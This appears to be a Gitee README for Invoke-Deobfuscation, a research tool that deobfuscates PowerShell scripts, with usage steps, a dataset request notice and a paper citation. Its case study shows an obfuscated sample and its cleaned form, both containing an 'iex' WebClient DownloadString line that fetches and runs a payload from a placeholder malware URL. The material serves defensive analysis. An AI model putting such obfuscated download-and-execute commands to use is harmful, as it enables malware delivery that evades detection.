代码拉取完成,页面将自动刷新
Environment
How to use it?
git clone https://gitee.com/snowroll/invoke-deobfuscation
cd invoke-deobfuscation/Code
pwsh # Linux or MacOS
Import-Module ./Invoke-DeObfuscation.psd1
DeObfuscatedMain -ScriptPath0 ../Data/demo.ps1
Case Study
demo.ps1
Ie`X ("{2}{0}{1}" -f 'ost h', 'ello', 'write-h')
$xdjmd = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
$lsffs = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
$sdfs = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($xdjmd + $lsffs))
.($psHoME[4]+$PShOmE[30]+'x') (Ne`W-oB`JeCt Net.Web`C`lient).downloadstring($sdfs)
Result
Write-Host hello
$var0 = 'aAB0AHQAcABzADoALwAvAHQAZQBzAHQALgBjAG'
$var1 = '8AbQAvAG0AYQBsAHcAYQByAGUALgB0AHgAdAA='
$var2 = 'https://test.com/malware.txt'
.('iex') (New-Object net.webclient).downloadstring('https://test.com/malware.txt')
DataSet Request
If you want the dataset (3346 highly obfuscated samples), please send me an email. My email address is chaihuajun@qianxin.com. There are some requirements for the email as follows.
The full dataset is not public. If you would like to collaborate on research, please feel free to contact us
Citation
@inproceedings{chai2022invoke,
title={Invoke-Deobfuscation: AST-Based and Semantics-Preserving Deobfuscation for PowerShell Scripts},
author={Chai, Huajun and Ying, Lingyun and Duan, Haixin and Zha, Daren},
booktitle={2022 52nd Annual IEEE/IFIP International Conference on Dependable Systems and Networks (DSN)},
pages={295--306},
year={2022},
organization={IEEE}
}
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。